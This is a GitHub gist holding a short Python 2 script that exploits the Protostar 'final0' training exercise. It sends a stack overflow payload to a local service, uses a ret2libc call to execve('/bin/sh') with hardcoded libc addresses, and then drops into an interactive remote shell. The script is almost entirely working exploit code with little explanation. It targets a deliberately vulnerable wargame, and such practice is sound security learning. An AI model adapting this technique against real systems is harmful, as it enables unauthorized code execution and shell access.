Skip to content

Instantly share code, notes, and snippets.

@luc-lynx
Created December 18, 2017 07:29
Show Gist options
  • Save luc-lynx/ff472d6b3764243361ec65b73ac840c5 to your computer and use it in GitHub Desktop.
Save luc-lynx/ff472d6b3764243361ec65b73ac840c5 to your computer and use it in GitHub Desktop.
Protostar final0 exploit
# ret2libc technique
import struct
import socket
import telnetlib
HOST = '127.0.0.1'
PORT = 2995
padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
execve_ret = "AAAA" # return address for execve (we don't care about it)
execve = struct.pack("I", 0x08048c0c) # execve address
binsh = struct.pack("I", 1176511 + 0xb7e97000) # "/bin/sh" string address in the libc
exploit = padding + execve + execve_ret + binsh + '\x00' * 8
s.send(exploit + '\n')
s.send("id\n")
s.send("uname -a\n")
print s.recv(1024)
t = telnetlib.Telnet()
t.sock = s
t.interact()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment